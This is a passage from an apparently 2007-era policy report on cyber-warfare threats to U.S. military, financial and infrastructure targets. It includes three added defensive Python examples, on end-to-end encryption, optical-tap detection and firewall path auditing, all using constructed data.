After entering the system, Boden remotely controlled 300 SCADA nodes governing both sewage and drinking water, and released large volumes of raw sewage (about 800,000 litres by the most commonly cited figure) into parks, rivers, and hotel grounds. His actions destroyed the ecosystem of the affected rivers and caused a stench that was “unbearable” to residents107. While there were no reported human deaths, Boden’s case is, as of this writing, the best-documented public case in which a deliberate intrusion into a SCADA system has been used to cause physical harm.

2.6.3.2 Roosevelt Dam

However, SCADA systems have also been accessed by intruders with no particular plan, and the results could have been disastrous if the systems had been mismanaged. The Washington Post account cited here reported that in 1998 a 12-year-old hacker unknowingly infiltrated the computer system controlling the Roosevelt Dam in Arizona, that federal authorities claimed the boy had complete control of the SCADA system that operates the dam’s floodgates, which hold back about 489 trillion gallons of water, and that if the gates were opened the resulting flood would mostly stay in a flood plain around the cities of Mesa and Tempe, engulfing them. That account was later disputed, and the 489-trillion-gallon figure is implausible on its face (no reservoir in the United States holds anything close to it), so the story is best read as an illustration of how little was known about the real exposure of such systems rather than as a verified incident. The comparison the source draws still stands: the cyber-security risk to a dam can exceed the physical risk, since physically destroying a dam would require “tons of explosives” according to Secretary of Homeland Security Michael Chertoff108.

There are many misconceptions surrounding the security of SCADA systems, and these leave critical infrastructures vulnerable to attacks from both internal and external sources. While there is no need to panic, the use of SCADA systems in cyber-warfare is a legitimate threat that must be addressed more fully.

105 SCADA Security and Terrorism: We're Not Crying Wolf. Black Hat. 2006. 1-36. 15 Oct. 2007 <http://www.blackhat.com/presentations/bh-federal-06/BH-Fed-06-Maynor-Graham-up.pdf>.

106 Gellman, Barton. "U.S. Fears Al Qaeda Cyber Attacks." SecurityFocus 26 June 2002. 18 Oct. 2007 <http://www.securityfocus.com/news/502>.

107 Gellman, Barton. "U.S. Fears Al Qaeda Cyber Attacks." SecurityFocus 26 June 2002. 18 Oct. 2007 <http://www.securityfocus.com/news/502>.

108 Gellman, Barton. "U.S. Fears Al Qaeda Cyber Attacks." SecurityFocus 26 June 2002. 18 Oct. 2007 <http://www.securityfocus.com/news/502>.

3 Targets

As we move further into the 21st century, our nation is increasingly threatened by cyber-warfare. Any foreign nation or terrorist group with a computer and a network connection can attack anything in the United States that is reachable from the Internet. This threat is not limited to one specific group, but could affect global corporations, utilities, transportation systems, the federal government, and the military. Securing our critical infrastructures should be our chief concern, as the government is the caretaker of our economic well-being, security and defense, and social services. Before we begin to discuss policy goals for the government to enact, it is vital to assess potential threats and vulnerabilities to the system as a whole.

3.1 Military and Government

As the keepers of our nation’s defense, the government and military are absolutely critical to the preservation of our nation, and consequently one of the leading targets for cyber-attack. Existing threats to the government and military are primarily data theft and data corruption. Since the late 1990s, there have been several documented data theft attacks on the United States attributed to unidentified foreign actors. Presently, this is the most pressing issue to national security. The military is also potentially vulnerable on the battlefield to cyber-attack, although many of the vulnerabilities are electronic attacks rather than cyber-attacks, a distinction that will be clarified. Lastly, the military faces the prospect of global threats from foreign nations gaining cyber-attack capabilities that could be used against the nation as a whole or directly on the battlefield.

3.1.1 Data Theft and Corruption

In the modern world, data theft and corruption are taking the place of traditional espionage and

spying. Rather than transporting physical files to obtain government secrets, hackers can simply

break through firewalls and other cyber-defense mechanisms to raid stored data in secure

government systems. This is the greatest threat to our government, and will continue to present

the foremost issue to counter when securing cyberspace.

There have been several historical cases of data theft that have been reported to the general

public. In 1997, a test called Eligible Receiver allowed an NSA ‘red team’ – hackers inside the

organization that try to break into secure systems – to attempt to hack into the Pentagon.

Ultimately they successfully infiltrated the Pentagon network, as well as gained control of

Pacific command center computers, power grids and 911 systems.109

In 1999, the government accidentally stumbled upon a series of data thefts that were collectively coined Moonlight Maze. Hackers had been systematically infiltrating computers in the Pentagon, NASA, the Department of Energy, and private universities and research facilities dating back nearly two years. Data stolen included troop structure as well as military hardware and base configurations. The electronic trail was traced back to Russia, but the sponsor of the attacks is still unknown.110

109 “Cyber-war!.” PBS: Frontline. April 2003. 29 Oct. 2007 <http://www.pbs.org/wgbh/pages/frontline/shows/cyberwar/warnings/>

A similar series of incidents, known as Titan Rain, consisted of widespread attacks from 2003 to 2005 against targets inside the government, military installations and top-level defense contractors. Although the stolen data was not classified, it included large quantities of sensitive material restricted by export control laws. It is not clear whether the data theft has ceased or who is behind it. The theft was traced back to China, but the Chinese government refuses to cooperate with U.S. investigations.[111]

These attacks are a continuing threat to the government and military. The Pentagon announced that in June 2007 hackers broke into Pentagon computers, including the computer of the Secretary of Defense, Robert Gates.[112] Although the government did not name a culprit, there is some suspicion of Chinese People’s Liberation Army involvement. Hackers continue to penetrate government systems despite the best efforts of defenders. Additionally, federal agencies such as the FBI cannot investigate the sources of the attacks abroad without foreign approval, which prevents any precise knowledge of the attackers. Although no theft of classified information is known, the volume of data stolen is staggering and a major threat to the government.

Closely related to data theft is data corruption. Having broken into a system, attackers can alter the software on it to perform many different actions. A common form of corruption is leaving ‘back door’ code in place so that the attacker can re-enter later without having to exploit the original weakness again. Compromised computers often contain a ‘trojan horse’, malicious code that, in addition to enabling re-entry, lets the attacker control the computer remotely or shut it down.[113] Many of the attack tools described earlier, such as DoS attacks, rely on such corrupted computers to work. Together, data theft and corruption present an ongoing and serious threat to both the government and the military.

3.1.2 Battlefield Cyber-attacks

Direct battlefield threats from cyber-warfare are hard to identify and evaluate. Some argue that any theft of military data, or any information that is potentially compromised, could lead to deaths in the field,[114] but the causal link is somewhat stretched. Unlike other cyber-attacks, battlefield uses of cyber-warfare are only effective when coupled with a physical attack, as in conveying incorrect troop strength and then ambushing a military unit. Although such cyber-attacks could lead to casualties, in themselves they are not the most pressing concern. However, as the nation’s military becomes increasingly advanced and reliant upon technology, there is some fear that these electronic systems could become vulnerable to attack, albeit an electronic attack.

110. Ibid.
111. Thornburgh, Nathan (2005). “The Invasion of the Chinese Cyberspies (And the Man Who Tried to Stop Them).” Time. Accessed 30 Oct. 2007. <http://www.time.com/time/magazine/article/0,9171,1098961-1,00.html>
112. “Pentagon Admits Security Breach but Won’t Say Who Did It.” NetworkWorld.com. Accessed 30 Oct. 2007. <http://www.networkworld.com/community/node/19041>
113. Thornburgh (2005), see note 111.
114. Ibid.

Cyber-attacks, as we have defined them, are primarily attacks launched through the internet to hack into a system for theft, corruption, or control of the compromised computer. A compromised computer can in turn be used for further malicious activity such as DoS attacks. There is concern for cyber-security on the battlefield, since a porous or weak network could feed poor troop information to soldiers, with the potential for friendly-fire accidents or enemy ambushes.[115]

While rear areas may depend upon a computer network for command and control, key information devices in the field are not susceptible to traditional cyber-attacks. A prominent example is the GPS system. Although it began as a military system, the widespread proliferation of GPS has made it a useful navigation system for the military, civilians and adversaries alike. A receiver takes its signal directly from the satellites and is not connected to the internet, so a cyber-attack on the battlefield network cannot reach it. Current GPS jammers are of questionable effectiveness: in Operation Iraqi Freedom, the Iraqi military had acquired several GPS jammers, which the United States ironically destroyed with GPS-guided munitions.[116] This is not to say that the system is invulnerable, but that the threats it faces are electronic-warfare threats.

Electronic warfare, distinct from cyber-warfare, is defined by the military as directing electromagnetic energy (jamming, electromagnetic pulses and the like) at enemy systems to deceive, disrupt or destroy them, in contrast to using computer code and hacking to achieve the same goal. In theory, electronic warfare could disrupt GPS satellites in space, overheat and permanently damage circuitry in electronic devices, take over adversary radio signals, or even misdirect unmanned craft or robots.[117] Although military technologies are widely classified, the ability of electronic warfare to damage robots could pose a threat to the Predator drone and other modern aerial robotics.

This is not to dismiss cyber-attacks as threats to the military, but rather to suggest that at the soldier level, cyber-attacks are not a direct threat. Some battlefield communication and organization runs over a local network that could be compromised, but soldiers still communicate by radio, which cyber threats do not hamper. Direct communication and navigation have not yet moved onto technologies that are vulnerable to cyber-attack. In the future, electronic warfare may play a preeminent role on the battlefield, but this is beyond the current scope of cyber-warfare.

115. Krebs, Brian (2003). “Cyber War Games Tests Future Troops.” Washington Post. Accessed 30 Oct. 2007. <http://www.washingtonpost.com/ac2/wp-dyn/A21871-2003Apr23>
116. “CENTCOM Operation Iraqi Freedom Briefing - 25 March 2003.” Accessed 30 Oct. 2007. <http://www.gulfinvestigations.net/document348.html?PHPSESSID=64c6f060d1f4997faf0ff91799fa777f>
117. Wilson, Clay (2007). “CRS Report for Congress: Information Operations, Electronic Warfare, and Cyberwar: Capabilities and Related Policy Issues.” Accessed 30 Oct. 2007. <http://stinet.dtic.mil/cgi-bin/GetTRDoc?AD=ADA466599&Location=U2&doc=GetTRDoc.pdf?>

3.1.3 Foreign Threats

Arguably the greatest threat, albeit primarily a future one, is the growing ability of foreign nations to conduct aggressive cyber operations against the United States. Cyber-warfare is widely accessible because effective operations require little infrastructure. As a result, many nations, including China, Iran and North Korea, are trying to develop means of attacking the United States. More than a dozen nations have credible cyber-warfare capability, although not all are hostile to the United States.[118] However, owing to its vast resources and evolving national strategy, China appears to be the most significant threat in the growing field of cyber-warfare.

In the past few years, China has placed increasing emphasis on cyber capabilities in its national strategy. In 2005, the PLA started to include offensive cyber operations in military exercises, with the explicit goal of achieving cyber dominance and a first-strike capability. In 2006, China added the goal of achieving dominance over its main adversaries throughout the electromagnetic spectrum by 2050.[119] Earlier in 2007, the Pentagon reportedly released a document describing China’s cyber capabilities, which included a plan to disable an American carrier task force. China has also successfully hacked into United States defense networks, as well as Whitehall in Great Britain and Germany’s government systems.[120]

Because China is the strongest adversary in this field, it is important to examine how it is attempting to achieve cyber dominance. First, the PLA has ‘cyber units’ specifically created within the military to develop and use cyber attacks. They are essentially military-sponsored hacking rings with the full backing of the national government. Additionally, the nation is scouring its population for the best talent for these units. Through education programs for teens and hacking competitions used to recruit talent, the ‘best and the brightest’ end up either working for the government on cyber-research or working as independent contractors, which gives the government plausible deniability. These units work from a “virtual guidebook” developed after reading dozens of Western manuals on military tactics and cyber-tactics.[121]

Assessing China’s actual cyber-capabilities is difficult at best. China has already shown proficiency at hacking into foreign government systems, but little else is known. Possibly its greatest advantage is that the United States is increasingly dependent upon electronic systems, which enlarges the attack surface and increases the risk of China using cyber-warfare to disrupt America’s technological advantage. Unfortunately, very little unclassified material is available regarding China’s capabilities. However, the small glimpses released to the public show a nation arming itself for what could be the Cold War of the 21st century, fought with cyber weapons instead of nuclear missiles.

118. “Cyber War Nightmares” (2006). Accessed 30 Oct. 2007. <http://www.strategypage.com/htmw/htiw/articles/20060829.aspx>
119. Rogin, Josh (2006). “DOD: China fielding cyberattack units.” Accessed 30 Oct. 2007. <http://www.fcw.com/online/news/94650-1.html>
120. Reid, Tim (2007). “China’s cyber army is preparing to march on America, says Pentagon.” The Times. Accessed 30 Oct. 2007. <http://technology.timesonline.co.uk/tol/news/tech_and_web/the_web/article2409865.ece>
121. Ibid.

3.2 Financial Systems as a Target

3.2.1 Overview

Powerful nations are developing cyber-warfare capabilities in an attempt to achieve cyber dominance. If a cyber-war were to erupt, these nations would likely attack our critical financial systems in an attempt to cripple the U.S. economy. Fortunately, the nations that have developed intensive cyber-warfare capabilities have a vested interest in the United States economy. Nations such as North Korea that lack a strong connection to our economy have yet to pose a serious threat in the cyber realm.

A more imminent threat lies in terrorist organizations that have no current interest in the welfare of the U.S. economy and often thrive in times of economic turmoil. Organizations such as al-Qaeda make no attempt to hide the fact that they aim to attack our economy with any available resources. Osama bin Laden made his goals very clear in December 2001, stating: “If their economy is destroyed, they will be busy with their own affairs rather than enslaving the weak peoples. It is very important to concentrate on hitting the U.S. economy through all possible means.” Al-Qaeda’s second-in-command, Ayman al-Zawahiri, said in September 2002: “We will also aim to continue, by the permission of Allah, the destruction of the American economy […] It is very important to concentrate on hitting the U.S. economy through all possible means […] look for the key pillars of the U.S. economy. The key pillars of the enemy should be struck.”[122]

The United States economy is roughly three times the size of Japan’s, the world’s second largest national economy.[123] This massive economy has become the target of many terrorist and other malicious organizations, and could become the target of nation states in the future. We know there is a motive; we must uncover and understand the vulnerabilities of this economic target. Condoleezza Rice, then the President’s National Security Advisor and now Secretary of State, said at the Partnership for Critical Infrastructure Security annual meeting in Washington in March 2001:

“Today, the cyber economy is the economy. And I don't mean the dot coms. I mean virtually every vital service -- water supply, transportation, energy, banking and finance, telecommunications, public health. All of these rely upon computers and the fiber-optic lines, switchers and routers that connect them. Corrupt those networks, and you disrupt the nation. It is a paradox of our times: the very technology that makes our economy so dynamic and our military forces so dominating -- also makes us more vulnerable. As the President's National Security Advisor, I have to worry about that vulnerability. But each corporate CEO has to worry about the fact that a much smaller cyber attack than on the U.S. could place the very existence of your company at issue.”[124]

122. Pethokoukis, James (2007). “So How Goes Bin Laden’s War on the U.S. Economy?” U.S. News & World Report. Accessed 27 Oct. 2007. <http://www.usnews.com/blogs/capital-commerce/2007/9/11/so-how-goes-bin-ladens-war-on-the-us-economy.html>
123. “Data and Statistics.” International Monetary Fund. 17 Oct. 2007. Accessed 27 Oct. 2007. <http://www.imf.org/external/data.htm#data>

Having established that our economy is a target, we turn to the vulnerabilities of our financial systems.

3.2.2 Direct Attacks on Financial Systems

Financial institutions such as banks and credit unions have historically been known for protecting critical data. Their business depends on keeping their clients’ money safe and secure. Given that over half of all major cyber attack incidents in 2001 targeted financial institutions, cyber-security is a top priority for them.[125] Institutions spend a large share of their profits to ensure that the systems handling their financial records and transactions are secure. Unfortunately, the financial sector has taken a giant step back since the arrival of high-speed wireless systems.

Electronic funds transfers (EFTs) are exchanged at a volume of over one trillion dollars per day. All of the data in these transfers is encrypted, but the encryption is applied link by link rather than end to end, and there are numerous ways that transfers made over wireless internet could be exposed to attackers. One such weakness was identified in banking over GSM phones. The data is protected by GSM encryption over the air and by standard internet encryption over the wired network, but it must cross from one to the other. In the split second that the data sits decrypted in the gateway between the wireless and wired networks, an attacker with access to that gateway could intercept it in the clear. While the skill and luck needed to pull this off are considerable, so is the reward, with billions of dollars to be stolen.[126]
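To make the gateway exposure concrete, here is an added example (not code from the original report, and not a model of any real carrier's or bank's system) that simulates a banking message crossing two separately encrypted hops, a wireless hop and a wired hop, through a gateway that decrypts and re-encrypts. The keys, the message and the cipher are constructed for the demonstration: a toy keystream cipher built from HMAC-SHA256 stands in for GSM and internet link encryption and is not a substitute for either. The point it shows is architectural: with hop-by-hop encryption alone the gateway holds the plaintext, whereas adding an end-to-end layer between the banking application and the bank leaves the gateway with only ciphertext.

```python
"""Hop-by-hop vs. end-to-end encryption across a wireless/wired gateway.

Added example for this report; all keys, the cipher and the message are
constructed for illustration. The keystream cipher below is a toy built from
HMAC-SHA256 in counter mode and stands in for the real link encryption; it is
not a production cipher.
"""
import hashlib
import hmac
import os
from typing import Tuple

# Constructed keys. In the scenario, the handset shares the wireless-hop key
# with the gateway, the gateway shares the wired-hop key with the bank, and
# only the banking app and the bank share the end-to-end key.
WIRELESS_HOP_KEY = b"gsm-air-interface-key-(constructed)"
WIRED_HOP_KEY = b"internet-link-key-(constructed)"
END_TO_END_KEY = b"bank-app-to-bank-key-(constructed)"


def keystream_xor(key: bytes, nonce: bytes, data: bytes) -> bytes:
    """Toy stream cipher: XOR data with HMAC-SHA256(key, nonce || counter).

    XOR is its own inverse, so the same call encrypts and decrypts.
    """
    stream = bytearray()
    counter = 0
    while len(stream) < len(data):
        block = hmac.new(key, nonce + counter.to_bytes(4, "big"), hashlib.sha256).digest()
        stream.extend(block)
        counter += 1
    return bytes(a ^ b for a, b in zip(data, stream))


def gateway_relay(wireless_frame: bytes, nonce: bytes) -> Tuple[bytes, bytes]:
    """Decrypt the wireless hop and re-encrypt for the wired hop.

    Returns (wired_frame, what_the_gateway_saw). The second value is exactly
    what an attacker sitting on the gateway could read.
    """
    between_hops = keystream_xor(WIRELESS_HOP_KEY, nonce, wireless_frame)
    wired_frame = keystream_xor(WIRED_HOP_KEY, nonce, between_hops)
    return wired_frame, between_hops


def transfer(message: bytes, end_to_end: bool) -> Tuple[bytes, bytes]:
    """Send a banking message handset -> gateway -> bank.

    Returns (message_as_received_by_bank, bytes_visible_at_gateway).
    """
    nonce = os.urandom(12)  # per-message nonce, carried alongside the frame

    # Optional end-to-end layer applied by the banking app before transmission.
    payload = keystream_xor(END_TO_END_KEY, nonce, message) if end_to_end else message

    # Wireless hop: handset encrypts with the air-interface key.
    wireless_frame = keystream_xor(WIRELESS_HOP_KEY, nonce, payload)

    # Gateway: decrypts the wireless hop, re-encrypts for the wired hop.
    wired_frame, seen_at_gateway = gateway_relay(wireless_frame, nonce)

    # Bank: decrypts the wired hop, then (if present) the end-to-end layer.
    received = keystream_xor(WIRED_HOP_KEY, nonce, wired_frame)
    if end_to_end:
        received = keystream_xor(END_TO_END_KEY, nonce, received)
    return received, seen_at_gateway


if __name__ == "__main__":
    msg = b"EFT 250000.00 USD FROM 1234567890 TO 0987654321"  # constructed
    for e2e in (False, True):
        received, seen = transfer(msg, end_to_end=e2e)
        print(f"end_to_end={e2e}: delivered intact={received == msg}, "
              f"plaintext visible at gateway={seen == msg}")
```

Run stand-alone, the script reports that the message is delivered intact in both configurations, but only in the end-to-end configuration does the gateway see something other than the plaintext. The real-world equivalent of the extra layer is application-level encryption between the banking client and the bank, which does not depend on who operates the intermediate networks.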

Another vulnerability in the transfer of financial information lies in the 180 million miles of fiber-optic cable that now connect the globe. Seth Page, CEO of Oyster Optics, explains a shocking vulnerability:

“For both public and private networks, optical taps and analytical devices are required and inexpensive maintenance equipment in common use worldwide today. Various types of optical taps, however, both off-the-shelf and customized, are also used for corporate espionage, government espionage, network disruption and other potential terrorist-type activities. Used nefariously, optical taps allow access to all voice and data communication transiting a fiber link.”[127]

This vulnerability is especially problematic because taps can be installed without detection: network carriers see glitches similar to those caused by inserting an optical tap on a daily basis, so the insertion is easily lost in the noise. While financial institutions do make efforts to encrypt data transferred over networks, there are many hackers worldwide, some working for nation-states and terrorist organizations, trying to defeat that encryption.

124. “National Security Advisor Rice on Protecting U.S. Infrastructure.” 22 March 2001. Accessed 27 Oct. 2007. <http://www.usembassy.it/file2001_03/alia/a1032210.htm>
125. Glaessner, Thomas, Tom Kellermann, and Valerie McNevin (2002). “Electronic Security: Risk Mitigation in Financial Transactions.” The World Bank, p. 43. Accessed 29 Oct. 2007. <http://info.worldbank.org/etools/docs/library/83592/esecurity_risk_mitigation.pdf>
126. “Wireless Vulnerabilities.” Maisonbisson. 24 Sept. 2002. Accessed 30 Oct. 2007. <http://maisonbisson.com/blog/post/10387/wireless-vulnerabilities>
127. Kabay, M. E. (2003). “Tapping Fiber Optics Gets Easier.” Network World. Accessed 29 Oct. 2007. <http://www.networkworld.com/newsletters/sec/2003/0303sec1.html>
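Whether a tap can be told apart from the daily glitches mentioned above is a detection question, so here is an added example (not code from the report, from Oyster Optics or from any carrier) of the check an operator could run over its own link telemetry. It assumes, as the discussion implies, that inserting a tap bleeds off a small but persistent fraction of the light and therefore lowers received optical power by a fraction of a decibel for as long as the tap stays attached, whereas a routine glitch is a brief dip that recovers. The power readings are constructed, the window and threshold values are assumptions, and the function names are the example's own.

```python
"""Distinguish a persistent optical-tap signature from transient glitches.

Added example; the power readings, thresholds and function names are
constructed for illustration. Assumption: a tap bleeds off light and lowers
received power (dBm) by a fraction of a dB for as long as it is attached,
while an ordinary glitch is a brief dip that recovers.
"""
from statistics import median


def naive_threshold_alerts(readings_dbm, floor_dbm=-12.0):
    """The obvious check: alert on any sample below a fixed floor.

    This fires on every transient glitch and misses a sub-dB tap entirely.
    """
    return [i for i, power in enumerate(readings_dbm) if power < floor_dbm]


def persistent_step_events(readings_dbm, window=5, min_drop_db=0.5):
    """Report sustained downward steps in received power.

    Compares the median of the `window` samples before each point with the
    median of the `window` samples from that point on. Medians ignore
    isolated dips, so only a drop that persists across the whole trailing
    window counts. Each event is reported once, at the first sample of the
    step, as {"index": i, "drop_db": d}.
    """
    events = []
    i = window
    while i + window <= len(readings_dbm):
        before = median(readings_dbm[i - window:i])
        after = median(readings_dbm[i:i + window])
        drop = before - after
        if drop >= min_drop_db:
            # Locate the first sample inside the trailing window that sits
            # at least min_drop_db below the pre-step level.
            start = next(j for j in range(i, i + window)
                         if before - readings_dbm[j] >= min_drop_db)
            events.append({"index": start, "drop_db": round(drop, 2)})
            i = start + window  # skip past this step so it is reported once
        else:
            i += 1
    return events


# Constructed telemetry: 30 received-power samples (dBm) from one fiber link.
# A one-sample glitch at index 10, then a 0.7 dB drop from index 20 onward
# (the tap-like signature).
SAMPLE_READINGS_DBM = (
    [-10.0] * 10 + [-13.0] + [-10.0] * 9 + [-10.7] * 10
)


if __name__ == "__main__":
    print("naive threshold alerts:", naive_threshold_alerts(SAMPLE_READINGS_DBM))
    print("persistent step events:", persistent_step_events(SAMPLE_READINGS_DBM))
```

On the constructed series the fixed-floor check alerts on the harmless glitch at sample 10 and never notices the 0.7 dB step at sample 20, while the windowed-median check does the reverse. In practice the drop threshold would be set from the link's measured noise, and a flagged step would be confirmed against maintenance records before anyone dispatched a crew.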

Financial institutions are an extremely valuable target for hackers, which is why such a large percentage of cyber-attacks fall on this sector. A survey by the Communications Management Association (CMA) found that thirty-two percent of the UK’s top 1,000 public and private institutions acknowledged having suffered a cyber attack, ranging from data theft to infiltration of corporate bank accounts.[128] Further, half of the senior staff surveyed considered the attacks a major threat to their institution’s survival. Financial institutions must constantly adapt if our economy is to remain safe from a thinking enemy.

3.3 Infrastructure

The United States’ critical infrastructure (power grids, water lines, communications, emergency response systems, and so on) is one of the most vulnerable and potentially devastating targets available to enemy states and terrorist groups. This was first demonstrated in 1997, when the aforementioned exercise “Eligible Receiver” used NSA hackers to attempt to infiltrate various infrastructure systems. The ‘red team’ was limited to computers and hacking software available to the public, but was still “able to infiltrate and take control of the Pacific command center computers, as well as power grids and 911 systems in nine major U.S. cities.”[129]

Another, more distressing, reported cyber-attack happened in the summer of 2001, when the webmaster for the city of Mountain View, CA recognized an odd site-intrusion pattern. He contacted the FBI, and further investigation found that similar attacks had been happening in multiple cities around the country. The intruders were found to be researching the cities’ utilities, government offices and emergency systems. When the sources of the attacks were traced, the signals seemed to come from the Middle East and South Asia. This information became particularly interesting when American intelligence agencies seized al-Qaeda laptops after the Sept. 11 attacks and found what appeared to be a “broad pattern of surveillance of U.S. infrastructure.”[130] Given the number of cyber threats to America’s infrastructure, the following presents the history and current dangers that our nation faces.

3.3.1 Power Utilities

Of all critical infrastructures, power utilities are perhaps the most desirable target for enemies because of their interconnectedness and relative lack of security backups, plans and software. In fact, every day large power utilities must fend off hundreds or even thousands of attackers attempting to shut down the power system, steal important data about the plant, or gain control of the regional grid.[131] However, because of the inherent complexity of the generators and their operating systems, very few successful attacks have occurred. This lack of successful attacks is the main reason why so little effort has gone into defending our infrastructure to date.[132]

128. Gwin, Peter (2001). “Is the Internet the Next Front in the Terror War?” Europe, Issue 410.
129. “Cyber-war!” PBS: Frontline. April 2003. Accessed 29 Oct. 2007. <http://www.pbs.org/wgbh/pages/frontline/shows/cyberwar/warnings/>
130. Ibid.

Even though only a few successful attacks on utilities have been recorded, their importance should not be overlooked. For example, in 2003 the “Slammer” worm propagated through thousands of unprotected computers. The volume of traffic the worm generated eventually became so large that it crashed the safety monitoring system at the Davis-Besse nuclear power plant in Ohio.[133] Fortunately the plant had built-in redundancies, and the backup safety system was not affected, so no long-term damage was done to either the plant or the surrounding area.

In a more recent event, in March 2007 the Department of Energy’s Idaho National Laboratory conducted an experiment in which it remotely destroyed a power generator. The team built a replica of a power plant’s control system, hacked into it, and commanded the generator to operate in a way contrary to the machine’s design. The resulting unbalanced rotation made the generator emit significant amounts of smoke and eventually shut down, breaking the generator.[134] The experiment was done to prove the vulnerability of our power grids should an enemy obtain the necessary security codes and generator specifications.

3.3.1.1 Why is the Power Grid so Vulnerable?

The basic problem within the power grid stems from the fact that all power systems within the United States are interconnected, yet the owners and operators of individual power plants rarely communicate security weaknesses to each other. The problem continues when utility companies try to improve their security, because the research and information they need is scarce, with government agencies offering little. This lack of information leads utility executives to make “security-related decisions on the basis of sparse, uncertain, or anecdotal information.”[135] Because communication between government agencies and power utilities is so poor, the industry’s security rests on a naturally weak foundation.

This raises the question of why the utility companies do not take the initiative and fund their own security research. Because the power companies have faced economic struggles in the past decade, they are all now competing with each other to remain viable, and many are unable to spare the resources for research.[136] However, some individual power utilities have pioneered the field and have found useful information. This information has not led to an overall improvement in cyber-security, though, owing to the lack of “effective technology transfer and broad industry support.”[137] This simply reflects the fact that individual companies do not share their research findings, and in turn most remain unprotected. That is a problem because “cyber-security is only as strong as the ‘weakest link’ in the chain of interconnected information and communication systems that utilities use.”[138] Because of this dilemma, Richard Clarke, former White House Cyber-Security Advisor, says that this is the one sector in which federal regulation makes sense. He believes that if the government does not step in and set a security standard, the companies are not going to do it themselves. Clarke continues: “For once, we have the companies saying they want it to be regulated, so that they're all required to do it simultaneously. There's the even playing field, and no one has competitive disadvantage by improving security.”[139]

131. Shainker, R. “Electric Utility Responses to Grid Issues.” IEEE Power & Energy Magazine, March/April 2006: 32. Accessed 24 Oct. 2007. <http://www.lib.ncsu.edu:2178/iel5/8014/33609/01597993.pdf?tp=&arnumber=1597993&isnumber=33609>
132. “Cyberwarfare on the Electricity Infrastructure.” Office of Scientific and Technical Information. Accessed 12 Sep. 2007. <http://www.osti.gov/bridge/product.biblio.jsp?osti_id=769245>
133. Poulsen, K. “Slammer worm crashed Ohio nuke plant network.” Security Focus, 19 August 2003. Accessed 12 Sep. 2007. <http://www.securityfocus.com/news/6767>
134. Meserve, J. “Staged cyber attack reveals vulnerability in power grid.” CNN, 26 September 2007. Accessed 4 Oct. 2007. <http://www.cnn.com/2007/US/09/26/power.at.risk/>
135. Shainker, op. cit., 32.

While a lack of cyber-security research is the main reason for the vulnerability of the power utility field, other problems also exist. One is the sheer size and interconnectedness of the American power system, which is both a curse and a gift. It is a curse because the system contains 200,000 miles of high-voltage lines, making it impossible to defend in its entirety against a terrorist attack. In fact, as the power grids continue to grow and become more interconnected, the vulnerability of the systems will continue to increase with the number of entry points. However, the system’s size is a gift in the sense that if a terrorist organization were to take over a power grid, it would only be able to affect a specific region. This would cause economic damage to the attacked area, but would not cripple the entire country’s economy if the power were restored within a few days.[140]

Another source of vulnerability is the changing business practices of the power companies. Many are turning to third-party vendors for administrative services such as payroll and accounting. This means the power station’s control system may inadvertently be connected to the vendor’s network. The problem is that the third party’s network may not be firewalled as robustly as the power plant’s control center, which opens the control center to attack via the vendor’s network.[141]
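The Slammer episode above shows what happens once worm traffic reaches a plant network, and the vendor connection just described is one way it gets there. Here is an added example (not the report's code, and not any utility's actual policy) of the kind of check a plant could run over its firewall policy to catch such a path before an attacker does. It models the policy as a list of zone-to-zone allow rules, exhaustively enumerates every route from low-trust zones into the control zone, and flags any route that does not pass through a monitored DMZ. The zones, the rules and the requirement that control-network traffic be brokered by a DMZ are constructed for the demonstration; the weak policy carries a direct vendor-to-control rule of the kind the paragraph warns about, and the hardened policy is the same policy with that rule replaced.

```python
"""Audit a firewall policy for paths into the control network that bypass the DMZ.

Added example; the zones, rules and the DMZ requirement are constructed for
illustration. Each rule is (source_zone, destination_zone, service) and means
the firewall permits connections initiated from source_zone to
destination_zone for that service.
"""
from collections import defaultdict

LOW_TRUST_ZONES = ("internet", "vendor", "corporate")
PROTECTED_ZONE = "control"
CHOKEPOINT_ZONE = "dmz"

# Constructed policy with the weakness described in the text: the accounting
# vendor's network is allowed straight through to the control zone.
WEAK_RULES = [
    ("internet", "dmz", "https"),
    ("corporate", "dmz", "https"),
    ("corporate", "vendor", "payroll-sync"),
    ("vendor", "control", "historian-export"),   # bypasses the DMZ
    ("dmz", "control", "historian-export"),
]

# Same policy with the direct rule replaced by a vendor -> dmz hop, so the
# historian export is brokered by a host the plant monitors.
HARDENED_RULES = [
    ("internet", "dmz", "https"),
    ("corporate", "dmz", "https"),
    ("corporate", "vendor", "payroll-sync"),
    ("vendor", "dmz", "historian-export"),
    ("dmz", "control", "historian-export"),
]


def adjacency(rules):
    """Map each zone to the set of zones it may initiate connections to."""
    graph = defaultdict(set)
    for src, dst, _service in rules:
        graph[src].add(dst)
    return graph


def paths_into(rules, target):
    """Enumerate every simple path from a low-trust zone to `target`.

    Services are ignored on purpose: for a worst-case reachability audit a
    single permitted service is enough to carry an attacker one hop.
    """
    graph = adjacency(rules)
    found = []

    def walk(zone, path):
        if zone == target:
            found.append(tuple(path))
            return
        for nxt in sorted(graph[zone]):
            if nxt not in path:          # keep paths simple (no cycles)
                walk(nxt, path + [nxt])

    for start in LOW_TRUST_ZONES:
        walk(start, [start])
    return found


def dmz_bypass_paths(rules):
    """Return the paths into the control zone that never cross the DMZ."""
    return [p for p in paths_into(rules, PROTECTED_ZONE)
            if CHOKEPOINT_ZONE not in p[1:-1]]


if __name__ == "__main__":
    for name, rules in (("weak", WEAK_RULES), ("hardened", HARDENED_RULES)):
        bypasses = dmz_bypass_paths(rules)
        print(f"{name}: {len(bypasses)} DMZ-bypassing path(s)")
        for p in bypasses:
            print("   ", " -> ".join(p))
```

Against the weak policy the audit reports two offending routes, vendor -> control and corporate -> vendor -> control; the second is the transitive case that a reviewer reading rules one at a time tends to miss. Against the hardened policy it reports none, even though the vendor still reaches the historian data it needs. Real policies are larger and have address-level rules, but the same exhaustive-path check scales to them once the rules are mapped to zones.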

136. Interview with Richard Clarke. “Cyber-war!” PBS: Frontline. April 2003. Accessed 29 Oct. 2007. <http://www.pbs.org/wgbh/pages/frontline/shows/cyberwar/warnings/>
137. Shainker, op. cit., 32.
138. Ibid.
139. Interview with Richard Clarke, op. cit. (note 136).
140. Shainker, op. cit., 31.
141. Shainker, op. cit., 35.

3.3.1.2 What is Being Done?

